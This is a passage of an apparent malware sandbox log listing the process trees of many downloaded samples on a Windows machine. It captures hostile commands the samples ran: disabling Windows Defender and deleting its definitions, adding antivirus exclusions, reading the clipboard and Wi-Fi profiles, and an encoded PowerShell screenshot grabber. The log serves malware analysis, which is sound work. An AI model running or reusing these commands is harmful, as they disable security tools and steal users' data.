- - C:\Users\Admin\Downloads\241002-xq7xtavhkcbff311d5c3ea8168aefd7a64a308d809ff61f03af5fa079af2f79160a7e51787N.exe
    C:\Users\Admin\Downloads\241002-xq7xtavhkcbff311d5c3ea8168aefd7a64a308d809ff61f03af5fa079af2f79160a7e51787N.exe
    3⤵
    PID:9332
  - - C:\Windows\SysWOW64\Kjjbjd32.exe
      C:\Windows\system32\Kjjbjd32.exe
      4⤵
      PID:10676
- - C:\Users\Admin\Downloads\241002-x3wejswemc89bdaaf79414362b9458e12eccb4cfd614cfd149867df91276e57456e1c5e051N.exe
    C:\Users\Admin\Downloads\241002-x3wejswemc89bdaaf79414362b9458e12eccb4cfd614cfd149867df91276e57456e1c5e051N.exe
    3⤵
    PID:9340
  - - C:\Windows\SysWOW64\Kfnfjehl.exe
      C:\Windows\system32\Kfnfjehl.exe
      4⤵
      PID:10648
- - C:\Users\Admin\Downloads\241002-yay6eawhjde4b89369349ecb97259eb311b4996e9acdd1d20c91804f6e83a25546fa2383a9N.exe
    C:\Users\Admin\Downloads\241002-yay6eawhjde4b89369349ecb97259eb311b4996e9acdd1d20c91804f6e83a25546fa2383a9N.exe
    3⤵
    PID:9348
- - C:\Users\Admin\Downloads\241002-ydxrratapp8a046fd3c412b7925aafaeb1161902d4.exe
    C:\Users\Admin\Downloads\241002-ydxrratapp8a046fd3c412b7925aafaeb1161902d4.exe
    3⤵
    PID:9356
- - C:\Users\Admin\Downloads\241002-ycfrvatakn3772e4872e797dc52bbcceb0e9dfcf77a04465917c9dbd3c5c8b2bf1108b22a9N.exe
    C:\Users\Admin\Downloads\241002-ycfrvatakn3772e4872e797dc52bbcceb0e9dfcf77a04465917c9dbd3c5c8b2bf1108b22a9N.exe
    3⤵
    PID:9364
  - - C:\Windows\SysWOW64\Kncaec32.exe
      C:\Windows\system32\Kncaec32.exe
      4⤵
      PID:10444
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10444 -s 396
        5⤵
        Program crash
        
        PID:6568
- - C:\Users\Admin\Downloads\241002-xy9flssdkn0c217e14d1f3f7410f564c91af876274_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xy9flssdkn0c217e14d1f3f7410f564c91af876274_JaffaCakes118.exe
    3⤵
    PID:9376
- - C:\Users\Admin\Downloads\241002-x22j6ssemn77d18ee21561930ff0bffe6d821a8e0a4ed658c86f13306cc8ac389ec5124416N.exe
    C:\Users\Admin\Downloads\241002-x22j6ssemn77d18ee21561930ff0bffe6d821a8e0a4ed658c86f13306cc8ac389ec5124416N.exe
    3⤵
    PID:9384
  - - \??\c:\ffxrlff.exe
      c:\ffxrlff.exe
      4⤵
      PID:10412
    - - \??\c:\hbbttt.exe
        
        c:\hbbttt.exe
        5⤵
        
        PID:5856
      - \??\c:\5xlxxrf.exe
        
        c:\5xlxxrf.exe
        6⤵
        
        PID:13712
        
        \??\c:\xxlxrff.exe
        
        c:\xxlxrff.exe
        7⤵
        
        PID:15724
        
        \??\c:\dpppv.exe
        
        c:\dpppv.exe
        8⤵
        
        PID:7800
        
        \??\c:\7hnhht.exe
        
        c:\7hnhht.exe
        9⤵
        
        PID:16536
- - C:\Users\Admin\Downloads\241002-xm2avsvfmb0c1237acd2f6f1f41540b0c9a003da67_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xm2avsvfmb0c1237acd2f6f1f41540b0c9a003da67_JaffaCakes118.exe
    3⤵
    PID:9392
- - C:\Users\Admin\Downloads\241002-xv5cgswbkc512b36784ea44eff5bcf12b820375b3b5585740a4fb4f084c4d4ddb5590d9b3cN.exe
    C:\Users\Admin\Downloads\241002-xv5cgswbkc512b36784ea44eff5bcf12b820375b3b5585740a4fb4f084c4d4ddb5590d9b3cN.exe
    3⤵
    PID:9400
- - C:\Users\Admin\Downloads\241002-x5akvssflj0c26f82604300312ee5979be46f6fc54_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x5akvssflj0c26f82604300312ee5979be46f6fc54_JaffaCakes118.exe
    3⤵
    PID:9408
- - C:\Users\Admin\Downloads\241002-xwla1awble6e076903754997808f8e7620a01413d98438565efcfef3d9f131036807552e65N.exe
    C:\Users\Admin\Downloads\241002-xwla1awble6e076903754997808f8e7620a01413d98438565efcfef3d9f131036807552e65N.exe
    3⤵
    PID:9416
- - C:\Users\Admin\Downloads\241002-ydyn2stapqd19ffa729650f55a578e61854f3fd6f341bebd35cb35eb498fe6dff8a4a1c6c4N.exe
    C:\Users\Admin\Downloads\241002-ydyn2stapqd19ffa729650f55a578e61854f3fd6f341bebd35cb35eb498fe6dff8a4a1c6c4N.exe
    3⤵
    PID:9424
  - - C:\Windows\SysWOW64\Kjeiodek.exe
      C:\Windows\system32\Kjeiodek.exe
      4⤵
      PID:10364
    - - C:\Windows\SysWOW64\Pfoann32.exe
        
        C:\Windows\system32\Pfoann32.exe
        5⤵
        
        PID:7724
      - C:\Windows\SysWOW64\Mcoljagj.exe
        
        C:\Windows\system32\Mcoljagj.exe
        6⤵
        
        PID:12600
        
        C:\Windows\SysWOW64\Kkegbpca.exe
        
        C:\Windows\system32\Kkegbpca.exe
        7⤵
        
        PID:13324
        
        C:\Windows\SysWOW64\Mebkge32.exe
        
        C:\Windows\system32\Mebkge32.exe
        8⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\Lndfchdj.exe
        
        C:\Windows\system32\Lndfchdj.exe
        9⤵
        
        PID:13436
        
        C:\Windows\SysWOW64\Hpejlc32.exe
        
        C:\Windows\system32\Hpejlc32.exe
        10⤵
        
        PID:4652
- - C:\Users\Admin\Downloads\241002-x3pxrssepna2ca73740e482bde958d86c0c6eced7b38f9c8fbd3e979b489b25c5d8e463087N.exe
    C:\Users\Admin\Downloads\241002-x3pxrssepna2ca73740e482bde958d86c0c6eced7b38f9c8fbd3e979b489b25c5d8e463087N.exe
    3⤵
    PID:9432
  - - C:\Windows\SysWOW64\Keimof32.exe
      C:\Windows\system32\Keimof32.exe
      4⤵
      PID:10336
    - - C:\Windows\SysWOW64\Ahmjjoig.exe
        
        C:\Windows\system32\Ahmjjoig.exe
        5⤵
        
        PID:4736
      - C:\Windows\SysWOW64\Mjidgkog.exe
        
        C:\Windows\system32\Mjidgkog.exe
        6⤵
        
        PID:12844
        
        C:\Windows\SysWOW64\Khkdad32.exe
        
        C:\Windows\system32\Khkdad32.exe
        7⤵
        
        PID:14480
        
        C:\Windows\SysWOW64\Jcaeea32.exe
        
        C:\Windows\system32\Jcaeea32.exe
        8⤵
        
        PID:13080
        
        C:\Windows\SysWOW64\Flboch32.exe
        
        C:\Windows\system32\Flboch32.exe
        9⤵
        
        PID:16316
- - C:\Users\Admin\Downloads\241002-x8a1sswfre805528b6f5b6337c28330e16993a7c5171c05eb23bed65155e774296b2e12d50N.exe
    C:\Users\Admin\Downloads\241002-x8a1sswfre805528b6f5b6337c28330e16993a7c5171c05eb23bed65155e774296b2e12d50N.exe
    3⤵
    PID:9440
  - - \??\c:\9nnhbt.exe
      c:\9nnhbt.exe
      4⤵
      PID:12284
    - - \??\c:\9ppjd.exe
        
        c:\9ppjd.exe
        5⤵
        
        PID:8772
      - \??\c:\5xrfxrf.exe
        
        c:\5xrfxrf.exe
        6⤵
        
        PID:12720
        
        \??\c:\tnhbtt.exe
        
        c:\tnhbtt.exe
        7⤵
        
        PID:3860
        
        \??\c:\jvddp.exe
        
        c:\jvddp.exe
        8⤵
        
        PID:11240
        
        \??\c:\hbnnhb.exe
        
        c:\hbnnhb.exe
        9⤵
        
        PID:6028
        
        \??\c:\hbhbbt.exe
        
        c:\hbhbbt.exe
        10⤵
        
        PID:3608
- - C:\Users\Admin\Downloads\241002-xls8vsveqf6383a0fcf65591d10b2daaf3709df71bc1fc5a83468f0fab7577ba4a2292c5baN.exe
    C:\Users\Admin\Downloads\241002-xls8vsveqf6383a0fcf65591d10b2daaf3709df71bc1fc5a83468f0fab7577ba4a2292c5baN.exe
    3⤵
    PID:9448
- - C:\Users\Admin\Downloads\241002-x1qfhssdrk762c9041718b74ea4d1c867ce25458cc186da07d1f8d413af8849d63275a5265N.exe
    C:\Users\Admin\Downloads\241002-x1qfhssdrk762c9041718b74ea4d1c867ce25458cc186da07d1f8d413af8849d63275a5265N.exe
    3⤵
    PID:9456
- - C:\Users\Admin\Downloads\241002-x21b4swejcfb1cc6afba37516c32f5151de543abb18ca9983aaeeb461bca1510fe6fbffc2aN.exe
    C:\Users\Admin\Downloads\241002-x21b4swejcfb1cc6afba37516c32f5151de543abb18ca9983aaeeb461bca1510fe6fbffc2aN.exe
    3⤵
    PID:9468
  - - C:\Windows\SysWOW64\Kpmdfonj.exe
      C:\Windows\system32\Kpmdfonj.exe
      4⤵
      PID:10284
    - - C:\Windows\SysWOW64\Pnfiplog.exe
        
        C:\Windows\system32\Pnfiplog.exe
        5⤵
        
        PID:9800
      - C:\Windows\SysWOW64\Dafppp32.exe
        
        C:\Windows\system32\Dafppp32.exe
        6⤵
        
        PID:11204
        
        C:\Windows\SysWOW64\Oqhoeb32.exe
        
        C:\Windows\system32\Oqhoeb32.exe
        7⤵
        
        PID:13748
- - C:\Users\Admin\Downloads\241002-x9pwcawgne61a4baf11e84558fd632de7d22f16cf24888bebd1cf6f22264656fee03e0f380N.exe
    C:\Users\Admin\Downloads\241002-x9pwcawgne61a4baf11e84558fd632de7d22f16cf24888bebd1cf6f22264656fee03e0f380N.exe
    3⤵
    PID:9476
  - - C:\Windows\SysWOW64\Klahfp32.exe
      C:\Windows\system32\Klahfp32.exe
      4⤵
      PID:10256
- - C:\Users\Admin\Downloads\241002-x23r8ssemp0c247952efd401ab20b1282bd4fb76f7_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x23r8ssemp0c247952efd401ab20b1282bd4fb76f7_JaffaCakes118.exe
    3⤵
    PID:9484
  - - C:\Windows\SysWOW64\ntdbg.exe
      C:\Windows\system32\ntdbg.exe c:\windows\system\explorer.exe
      4⤵
      PID:13760
    - - C:\Windows\SysWOW64\ntdbg.exe
        
        C:\Windows\system32\ntdbg.exe c:\windows\system\explorer.exe
        5⤵
        
        PID:8948
- - C:\Users\Admin\Downloads\241002-xl7q9a1gjp3650aa4747fa450d23eee8c2048f445d52aa502bf5d5a72c0860946a14814a13N.exe
    C:\Users\Admin\Downloads\241002-xl7q9a1gjp3650aa4747fa450d23eee8c2048f445d52aa502bf5d5a72c0860946a14814a13N.exe
    3⤵
    PID:9492
  - - C:\Windows\SysWOW64\Kjblje32.exe
      C:\Windows\system32\Kjblje32.exe
      4⤵
      PID:1084
    - - C:\Windows\SysWOW64\Pjkmomfn.exe
        
        C:\Windows\system32\Pjkmomfn.exe
        5⤵
        
        PID:6884
- - C:\Users\Admin\Downloads\241002-x7y18swfqh692d5201be05aedabab8fbfbcba41784c9d5de8c083e8d70dd29d2121eb920bcN.exe
    C:\Users\Admin\Downloads\241002-x7y18swfqh692d5201be05aedabab8fbfbcba41784c9d5de8c083e8d70dd29d2121eb920bcN.exe
    3⤵
    PID:9500
- - C:\Users\Admin\Downloads\241002-xdt57avbqcRoAudio.exe
    C:\Users\Admin\Downloads\241002-xdt57avbqcRoAudio.exe
    3⤵
    PID:9508
  - - C:\Users\Admin\Downloads\241002-xdt57avbqcRoAudio.exe
      C:\Users\Admin\Downloads\241002-xdt57avbqcRoAudio.exe
      4⤵
      PID:2252
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\241002-xdt57avbqcRoAudio.exe'"
        5⤵
        
        PID:6832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:15872
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NO KEY FOUND CONTACT 9P2D TO BUY!', 0, '3x8de', 0+16);close()""
        5⤵
        
        PID:15896
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:16800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:17252
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:13476
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:15720
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:15104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:13816
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:16968
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:7860
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:10668
- - C:\Users\Admin\Downloads\241002-xwdadswblbea0d4f13ccfa8eb2632fe134def8472c518c4771930bc4ad65e6884e07b802b4N.exe
    C:\Users\Admin\Downloads\241002-xwdadswblbea0d4f13ccfa8eb2632fe134def8472c518c4771930bc4ad65e6884e07b802b4N.exe
    3⤵
    PID:9516
- - C:\Users\Admin\Downloads\241002-xzst9awdjb4687199e45410438ef3ec7d4f675ad4b89d871ba2a32f43952f2710777047dd0N.exe
    C:\Users\Admin\Downloads\241002-xzst9awdjb4687199e45410438ef3ec7d4f675ad4b89d871ba2a32f43952f2710777047dd0N.exe
    3⤵
    PID:9524
  - - C:\Windows\SysWOW64\Kegpifod.exe
      C:\Windows\system32\Kegpifod.exe
      4⤵
      PID:3984
    - - C:\Windows\SysWOW64\Pnfiplog.exe
        
        C:\Windows\system32\Pnfiplog.exe
        5⤵
        
        PID:9672
      - C:\Windows\SysWOW64\Cklhcfle.exe
        
        C:\Windows\system32\Cklhcfle.exe
        6⤵
        
        PID:11880
        
        C:\Windows\SysWOW64\Mhldbh32.exe
        
        C:\Windows\system32\Mhldbh32.exe
        7⤵
        
        PID:12696
        
        C:\Windows\SysWOW64\Khkdad32.exe
        
        C:\Windows\system32\Khkdad32.exe
        8⤵
        
        PID:8620
        
        C:\Windows\SysWOW64\Jeneidji.exe
        
        C:\Windows\system32\Jeneidji.exe
        9⤵
        
        PID:13444
        
        C:\Windows\SysWOW64\Gpodkdll.exe
        
        C:\Windows\system32\Gpodkdll.exe
        10⤵
        
        PID:13632
- - C:\Users\Admin\Downloads\241002-xshqpsvhqgb3046eeab544d8405f32ce0ba0d471c64403fde196eca4469aa4cbd3659fd84fN.exe
    C:\Users\Admin\Downloads\241002-xshqpsvhqgb3046eeab544d8405f32ce0ba0d471c64403fde196eca4469aa4cbd3659fd84fN.exe
    3⤵
    PID:9532
- - C:\Users\Admin\Downloads\241002-x8q21swgkc0c2c73f655b3ebeb06b7869d39a65c61_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x8q21swgkc0c2c73f655b3ebeb06b7869d39a65c61_JaffaCakes118.exe
    3⤵
    PID:9540
  - - C:\Windows\updateFMcDDSILDbFjhPEYPGTdNMzzbjvYrX.exe
      C:\Windows\updateFMcDDSILDbFjhPEYPGTdNMzzbjvYrX.exe
      4⤵
      PID:11908
  - - C:\Windows\updateFMcDDSILDbFjhPEYPGTdNMzzbjvYrX.exe
      C:\Windows\updateFMcDDSILDbFjhPEYPGTdNMzzbjvYrX.exe
      4⤵
      PID:3212
    - - C:\Windows\SysWOW64\ntdbg.exe
        
        C:\Windows\system32\ntdbg.exe explorer.exe
        5⤵
        
        PID:13340
- - C:\Users\Admin\Downloads\241002-xrpsmavhmb05ce79ec87398e71c2213db5345dbc159084d43d79dedc0198ebe891735b2849N.exe
    C:\Users\Admin\Downloads\241002-xrpsmavhmb05ce79ec87398e71c2213db5345dbc159084d43d79dedc0198ebe891735b2849N.exe
    3⤵
    PID:9552
  - - C:\Windows\SysWOW64\Jlolpq32.exe
      C:\Windows\system32\Jlolpq32.exe
      4⤵
      PID:5964
    - - C:\Windows\SysWOW64\Pjkmomfn.exe
        
        C:\Windows\system32\Pjkmomfn.exe
        5⤵
        
        PID:10044
      - C:\Windows\SysWOW64\Mfnhfm32.exe
        
        C:\Windows\system32\Mfnhfm32.exe
        6⤵
        
        PID:12688
        
        C:\Windows\SysWOW64\Kaopoj32.exe
        
        C:\Windows\system32\Kaopoj32.exe
        7⤵
        
        PID:6920
        
        C:\Windows\SysWOW64\Mcfkpjng.exe
        
        C:\Windows\system32\Mcfkpjng.exe
        8⤵
        
        PID:13580
        
        C:\Windows\SysWOW64\Lokldg32.exe
        
        C:\Windows\system32\Lokldg32.exe
        9⤵
        
        PID:12780
        
        C:\Windows\SysWOW64\Hladlc32.exe
        
        C:\Windows\system32\Hladlc32.exe
        10⤵
        
        PID:9868
- - C:\Users\Admin\Downloads\241002-xxk2mawbqgdf8fe0b4e10e4104dd24309730d3c77ffc8846f831f8bde0e097e6487ddc3d5dN.exe
    C:\Users\Admin\Downloads\241002-xxk2mawbqgdf8fe0b4e10e4104dd24309730d3c77ffc8846f831f8bde0e097e6487ddc3d5dN.exe
    3⤵
    PID:9560
  - - C:\Windows\SysWOW64\Jlolpq32.exe
      C:\Windows\system32\Jlolpq32.exe
      4⤵
      PID:7852
    - - C:\Windows\SysWOW64\Pnfiplog.exe
        
        C:\Windows\system32\Pnfiplog.exe
        5⤵
        
        PID:9832
      - C:\Windows\SysWOW64\Pakdbp32.exe
        
        C:\Windows\system32\Pakdbp32.exe
        6⤵
        
        PID:624
        
        C:\Windows\SysWOW64\Koljgppp.exe
        
        C:\Windows\system32\Koljgppp.exe
        7⤵
        
        PID:12556
        
        C:\Windows\SysWOW64\Mkgmoncl.exe
        
        C:\Windows\system32\Mkgmoncl.exe
        8⤵
        
        PID:7044
- - C:\Users\Admin\Downloads\241002-x2p65sselq0c242e7aeedf36e7ad20612a3917d38c_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x2p65sselq0c242e7aeedf36e7ad20612a3917d38c_JaffaCakes118.exe
    3⤵
    PID:9568
- - C:\Users\Admin\Downloads\241002-x8zddssgpr80b1d6411e29e51e54f20f46856d31b28e087e9244693e65d022b680c4ba00ce.exe
    C:\Users\Admin\Downloads\241002-x8zddssgpr80b1d6411e29e51e54f20f46856d31b28e087e9244693e65d022b680c4ba00ce.exe
    3⤵
    PID:9604
- - C:\Users\Admin\Downloads\241002-x4cc3awenh0c25b96d58338a65f1b027a6838216fc_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-x4cc3awenh0c25b96d58338a65f1b027a6838216fc_JaffaCakes118.exe
    3⤵
    PID:1356
- - C:\Users\Admin\Downloads\241002-ycjhqswhpc658db24019feccf6c7ebb9e937ad394f09474392d2da228a802ebda8f03f8bc6N.exe
    C:\Users\Admin\Downloads\241002-ycjhqswhpc658db24019feccf6c7ebb9e937ad394f09474392d2da228a802ebda8f03f8bc6N.exe
    3⤵
    PID:11784
  - - C:\Windows\SysWOW64\Bklomh32.exe
      C:\Windows\system32\Bklomh32.exe
      4⤵
      PID:10480
    - - C:\Windows\SysWOW64\Mfnhfm32.exe
        
        C:\Windows\system32\Mfnhfm32.exe
        5⤵
        
        PID:14060
      - C:\Windows\SysWOW64\Khihld32.exe
        
        C:\Windows\system32\Khihld32.exe
        6⤵
        
        PID:14260
        
        C:\Windows\SysWOW64\Jfhlpnfp.exe
        
        C:\Windows\system32\Jfhlpnfp.exe
        7⤵
        
        PID:14896
        
        C:\Windows\SysWOW64\Glchjedc.exe
        
        C:\Windows\system32\Glchjedc.exe
        8⤵
        
        PID:17524
- - C:\Users\Admin\Downloads\241002-ycsfmstalp0c32ebaf3df653e112eec90555450afd_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-ycsfmstalp0c32ebaf3df653e112eec90555450afd_JaffaCakes118.exe
    3⤵
    PID:11476
- - C:\Users\Admin\Downloads\241002-x2891swekd1400707afad2dab4720b30b65de64a61dc4f53cd03d525d6d388debb86830e8fN.exe
    C:\Users\Admin\Downloads\241002-x2891swekd1400707afad2dab4720b30b65de64a61dc4f53cd03d525d6d388debb86830e8fN.exe
    3⤵
    PID:11828
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:15528
- - C:\Users\Admin\Downloads\241002-yetrgsxapde0c1d7de366d004a4c85e5936e80854f4b8767638ea5bbea8e331626ddacf286N.exe
    C:\Users\Admin\Downloads\241002-yetrgsxapde0c1d7de366d004a4c85e5936e80854f4b8767638ea5bbea8e331626ddacf286N.exe
    3⤵
    PID:6564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8644
  - - C:\Windows\System\fDZyRtD.exe
      C:\Windows\System\fDZyRtD.exe
      4⤵
      PID:8488
  - - C:\Windows\System\KlJTamz.exe
      C:\Windows\System\KlJTamz.exe
      4⤵
      PID:13756
  - - C:\Windows\System\SFJTmUo.exe
      C:\Windows\System\SFJTmUo.exe
      4⤵
      PID:16756
  - - C:\Windows\System\WEpCFdf.exe
      C:\Windows\System\WEpCFdf.exe
      4⤵
      PID:17052
  - - C:\Windows\System\VOUvcwe.exe
      C:\Windows\System\VOUvcwe.exe
      4⤵
      PID:3132
  - - C:\Windows\System\ZxDdQle.exe
      C:\Windows\System\ZxDdQle.exe
      4⤵
      PID:10372
  - - C:\Windows\System\NDWmtJx.exe
      C:\Windows\System\NDWmtJx.exe
      4⤵
      PID:11596
  - - C:\Windows\System\AUXpKVV.exe
      C:\Windows\System\AUXpKVV.exe
      4⤵
      PID:15668
  - - C:\Windows\System\iMcCJSf.exe
      C:\Windows\System\iMcCJSf.exe
      4⤵
      PID:11056
  - - C:\Windows\System\pmZYyNR.exe
      C:\Windows\System\pmZYyNR.exe
      4⤵
      PID:17584
  - - C:\Windows\System\YzpBvnU.exe
      C:\Windows\System\YzpBvnU.exe
      4⤵
      PID:3516
  - - C:\Windows\System\OAlwMgU.exe
